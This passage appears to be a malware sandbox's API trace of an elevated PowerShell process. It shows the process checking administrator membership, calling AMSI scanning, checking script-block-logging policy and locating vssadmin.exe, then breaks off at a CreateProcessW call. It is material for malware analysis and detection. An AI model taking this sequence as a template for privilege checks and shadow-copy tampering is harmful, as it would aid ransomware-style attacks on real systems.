[0082.279] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0082.531] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0082.703] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0082.887] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0083.075] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0083.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0083.469] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0083.710] GetCurrentProcess () returned 0xffffffff [0083.710] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ebf610 | out: TokenHandle=0x6ebf610*=0x620) returned 1 [0083.715] GetTokenInformation (in: TokenHandle=0x620, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x6ebf614 | out: TokenInformation=0x0, ReturnLength=0x6ebf614) returned 0 [0083.715] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x700a388 [0083.716] GetTokenInformation (in: TokenHandle=0x620, TokenInformationClass=0x8, TokenInformation=0x700a388, TokenInformationLength=0x4, ReturnLength=0x6ebf614 | out: TokenInformation=0x700a388, ReturnLength=0x6ebf614) returned 1 [0083.717] LocalFree (hMem=0x700a388) returned 0x0 [0083.718] DuplicateTokenEx (in: hExistingToken=0x620, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x6ebf61c | out: phNewToken=0x6ebf61c*=0x644) returned 1 [0083.718] CheckTokenMembership (in: TokenHandle=0x644, SidToCheck=0x48aaba0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x6ebf62c | out: IsMember=0x6ebf62c) returned 1 [0083.718] CloseHandle (hObject=0x644) returned 1 [0083.929] CoTaskMemAlloc (cb=0x804) returned 0x71b1170 [0083.929] GetConsoleTitleW (in: lpConsoleTitle=0x71b1170, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x3a [0086.845] CoTaskMemFree (pv=0x71b1170) [0087.073] CoTaskMemAlloc (cb=0x804) returned 0x71b1170 [0087.073] GetConsoleTitleW (in: lpConsoleTitle=0x71b1170, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x3a [0087.503] CoTaskMemFree (pv=0x71b1170) [0087.507] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0087.788] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0087.962] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0088.119] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0088.307] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0088.519] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0088.657] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0088.860] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0089.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0089.391] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0089.578] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0089.766] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0089.880] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0089.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.074] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.200] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.420] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.479] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.501] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.506] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.528] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.552] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.613] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.723] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0090.971] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0091.042] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0094.780] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0094.932] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0095.116] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0095.456] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ebf4e8 | out: phkResult=0x6ebf4e8*=0x644) returned 0x0 [0095.460] RegQueryValueExW (in: hKey=0x644, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6ebf508, lpData=0x0, lpcbData=0x6ebf504*=0x0 | out: lpType=0x6ebf508*=0x1, lpData=0x0, lpcbData=0x6ebf504*=0x56) returned 0x0 [0095.460] RegQueryValueExW (in: hKey=0x644, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6ebf508, lpData=0x49604c0, lpcbData=0x6ebf504*=0x56 | out: lpType=0x6ebf508*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x6ebf504*=0x56) returned 0x0 [0095.460] RegCloseKey (hKey=0x644) returned 0x0 [0095.790] CoCreateGuid (in: pguid=0x6ebf490 | out: pguid=0x6ebf490*(Data1=0xc4613ec7, Data2=0x90d8, Data3=0x4b81, Data4=([0]=0x85, [1]=0x9e, [2]=0x74, [3]=0x16, [4]=0x42, [5]=0xd2, [6]=0x43, [7]=0x1c))) returned 0x0 [0095.790] CoCreateGuid (in: pguid=0x6ebf490 | out: pguid=0x6ebf490*(Data1=0xf2b49777, Data2=0x85eb, Data3=0x4cad, Data4=([0]=0x8e, [1]=0xc5, [2]=0x2b, [3]=0x67, [4]=0x11, [5]=0x4c, [6]=0x4c, [7]=0xe9))) returned 0x0 [0095.790] CoCreateGuid (in: pguid=0x6ebf490 | out: pguid=0x6ebf490*(Data1=0x4fc5b014, Data2=0xeba5, Data3=0x4a4a, Data4=([0]=0xbb, [1]=0x61, [2]=0x84, [3]=0xcf, [4]=0x6c, [5]=0x7f, [6]=0x18, [7]=0x34))) returned 0x0 [0095.790] CoCreateGuid (in: pguid=0x6ebf490 | out: pguid=0x6ebf490*(Data1=0xc307e59, Data2=0x9c2a, Data3=0x402b, Data4=([0]=0x91, [1]=0xbf, [2]=0xe0, [3]=0x38, [4]=0xaf, [5]=0x69, [6]=0x97, [7]=0xdb))) returned 0x0 [0095.792] CoCreateGuid (in: pguid=0x6ebf490 | out: pguid=0x6ebf490*(Data1=0x5c9cba3b, Data2=0xc6b3, Data3=0x4fd3, Data4=([0]=0xa2, [1]=0x81, [2]=0x67, [3]=0x34, [4]=0xb9, [5]=0xb0, [6]=0x1a, [7]=0x88))) returned 0x0 [0095.792] CoCreateGuid (in: pguid=0x6ebf490 | out: pguid=0x6ebf490*(Data1=0x7db2895a, Data2=0x1614, Data3=0x45f5, Data4=([0]=0xa5, [1]=0x61, [2]=0x5f, [3]=0x8c, [4]=0x3d, [5]=0xce, [6]=0x69, [7]=0xa))) returned 0x0 [0097.238] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0097.518] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0097.644] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0097.718] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0097.809] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0097.966] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0098.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0098.168] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0098.410] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0098.544] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0098.704] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0098.897] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0098.998] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.158] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.472] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0099.568] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.109] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.315] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.620] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.785] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0107.993] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.135] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.208] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.335] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0108.387] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.867] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.870] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.876] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.881] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.899] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.901] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.902] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.909] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.910] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.915] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.919] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.927] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.929] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.965] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.968] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.972] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.974] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.974] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.975] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0112.976] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.002] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.003] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.005] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.008] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.008] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.009] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.012] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.013] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.014] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.043] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.163] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.238] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.459] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.466] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.481] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.532] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.603] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.745] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.843] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.898] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0113.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0114.043] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0114.156] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0114.306] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0114.443] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0114.700] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.044] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.313] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.349] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.480] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.643] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.751] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.863] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0115.966] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0116.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0116.224] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0116.349] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0116.450] SleepEx (dwMilliseconds=0x0, bAlertable=0) Thread: id = 43 os_tid = 0x1350 Thread: id = 44 os_tid = 0x1390 Thread: id = 45 os_tid = 0x1298 Thread: id = 46 os_tid = 0x12a8 Thread: id = 47 os_tid = 0x12b0 [0088.307] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0088.307] CoGetContextToken (in: pToken=0x745f5bc | out: pToken=0x745f5bc) returned 0x0 [0088.307] CObjectContext::QueryInterface () returned 0x0 [0088.307] CObjectContext::GetCurrentThreadType () returned 0x0 [0088.307] Release () returned 0x0 [0088.307] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0088.307] CoUninitialize () [0088.307] RoInitialize () returned 0x1 [0088.307] RoUninitialize () returned 0x0 [0116.504] CoGetContextToken (in: pToken=0x745f36c | out: pToken=0x745f36c) returned 0x0 [0116.504] CObjectContext::QueryInterface () returned 0x0 [0116.504] CObjectContext::GetCurrentThreadType () returned 0x0 [0116.504] Release () returned 0x0 [0116.526] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 48 os_tid = 0x12a0 [0088.630] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0088.630] RoInitialize () returned 0x1 [0088.630] RoUninitialize () returned 0x0 [0088.659] GetCurrentProcessId () returned 0xd2c [0088.661] EtwEventWriteTransfer (RegHandle=0xb08968, EventDescriptor=0x2e, ActivityId=0x74df5dc, RelatedActivityId=0x74df58c, UserDataCount=0x0, UserData=0x8) returned 0x0 [0088.662] EtwEventWriteTransfer (RegHandle=0xb08968, EventDescriptor=0x2e, ActivityId=0x74df608, RelatedActivityId=0x74df5b8, UserDataCount=0x0, UserData=0x2) returned 0x0 [0088.663] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x670 [0088.668] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_Disabled", lpBuffer=0x74ded3c, nSize=0x80 | out: lpBuffer="က煬\x01") returned 0x0 [0088.668] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_MinCount", lpBuffer=0x74ded3c, nSize=0x80 | out: lpBuffer="က煬\x01") returned 0x0 [0088.671] EtwEventRegister (in: ProviderId=0x490691c, EnableCallback=0x4772cf6, CallbackContext=0x0, RegHandle=0x49068f8 | out: RegHandle=0x49068f8) returned 0x0 [0088.671] EtwEventSetInformation (RegHandle=0x6fce2a0, InformationClass=0x50, EventInformation=0x2, InformationLength=0x49068c0) returned 0x0 [0088.675] ConnectNamedPipe (in: hNamedPipe=0x648, lpOverlapped=0x4906b04 | out: lpOverlapped=0x4906b04) returned 0 Thread: id = 49 os_tid = 0x12bc Thread: id = 50 os_tid = 0xf30 Thread: id = 51 os_tid = 0x13b8 Thread: id = 52 os_tid = 0xcfc [0104.031] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0104.229] RoInitialize () returned 0x1 [0104.229] RoUninitialize () returned 0x0 [0104.234] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x802f0dc*=0x6ec, lpdwindex=0x802eefc | out: lpdwindex=0x802eefc) returned 0x0 [0104.634] SetThreadUILanguage (LangId=0x0) returned 0x870409 [0104.854] EtwEventRegister (in: ProviderId=0x4b762dc, EnableCallback=0x4772e06, CallbackContext=0x0, RegHandle=0x4b762b8 | out: RegHandle=0x4b762b8) returned 0x0 [0104.855] EtwEventSetInformation (RegHandle=0x6fcf1d0, InformationClass=0x59, EventInformation=0x2, InformationLength=0x4b76290) returned 0x0 [0105.415] CoCreateGuid (in: pguid=0x802ef48 | out: pguid=0x802ef48*(Data1=0xa49d0364, Data2=0xca0d, Data3=0x40ac, Data4=([0]=0x92, [1]=0x4b, [2]=0xb1, [3]=0xd7, [4]=0xd5, [5]=0x4a, [6]=0xe8, [7]=0xf6))) returned 0x0 [0105.619] QueryPerformanceCounter (in: lpPerformanceCount=0x802ef28 | out: lpPerformanceCount=0x802ef28*=19937076068) returned 1 [0105.622] AmsiOpenSession () returned 0x0 [0105.622] AmsiScanString () returned 0x80070015 [0107.101] CoCreateGuid (in: pguid=0x802e3d8 | out: pguid=0x802e3d8*(Data1=0x9c2fb27c, Data2=0xef26, Data3=0x4ac5, Data4=([0]=0x8b, [1]=0x6f, [2]=0x2b, [3]=0x41, [4]=0x13, [5]=0xfa, [6]=0x6b, [7]=0x79))) returned 0x0 [0108.480] QueryPerformanceCounter (in: lpPerformanceCount=0x802eef0 | out: lpPerformanceCount=0x802eef0*=20223174884) returned 1 [0108.489] EtwEventRegister (in: ProviderId=0x4b857d8, EnableCallback=0x4772ef6, CallbackContext=0x0, RegHandle=0x4b857b4 | out: RegHandle=0x4b857b4) returned 0x0 [0108.489] EtwEventSetInformation (RegHandle=0x71f5c58, InformationClass=0x63, EventInformation=0x2, InformationLength=0x4b85784) returned 0x0 [0108.489] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x802ed60, nSize=0x80 | out: lpBuffer="膼珬က溹스滄\x01耀哔狑臸珬\x02") returned 0x0 [0109.449] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x802efb8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802efb8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x53, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0109.449] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x802ef24*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802ef24*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0109.450] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x802efa8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x53, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x802efa8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x53, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0109.633] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x802efb8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802efb8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x54, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0109.633] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x802ef24*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802ef24*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x53, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0109.633] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x802efa8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x54, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x802efa8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x54, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0110.045] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x802edcc | out: phkResult=0x802edcc*=0x0) returned 0x2 [0110.047] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x802edcc | out: phkResult=0x802edcc*=0x0) returned 0x2 [0110.254] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x802e968, nSize=0x80 | out: lpBuffer="ࠂࠂࠂ஗Ȁ渴濯") returned 0x0 [0110.257] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x802e884, nSize=0x80 | out: lpBuffer="") returned 0xbc [0110.257] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x802e80c, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0110.260] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x802e7f8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0110.494] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xb7ad50 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0110.497] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\vssadmin.*", lpFindFileData=0x802e6dc | out: lpFindFileData=0x802e6dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0110.498] FindNextFileW (in: hFindFile=0xb85c10, lpFindFileData=0x802e6cc | out: lpFindFileData=0x802e6cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0110.499] FindClose (in: hFindFile=0xb85c10 | out: hFindFile=0xb85c10) returned 1 [0110.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x802e954) returned 1 [0110.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x802e960) returned 1 [0110.505] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe")) returned 0x20 [0110.510] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x802ec4c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802ec4c*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x55, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0110.510] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x802ebb8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x802ebb8*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x54, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0110.511] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x802ec3c*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x55, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x802ec3c*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0x55, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0110.625] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\system32\\vssadmin.exe", dwFileAttributes=0x0, psfi=0x802e794, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x802e794) returned 0x4550 [0110.658] GetConsoleWindow () returned 0x502c2 [0110.885] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x802e560, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0110.900] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x802e7f0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0110.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x802e0f0, nSize=0xbc | out: lpBuffer="抈猵") returned 0x0 [0110.906] CoTaskMemAlloc (cb=0x804) returned 0x7201d90 [0110.906] GetConsoleTitleW (in: lpConsoleTitle=0x7201d90, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0111.503] CoTaskMemFree (pv=0x7201d90) [0111.507] CreateProcessW (in: lpApplicationName=0x0, 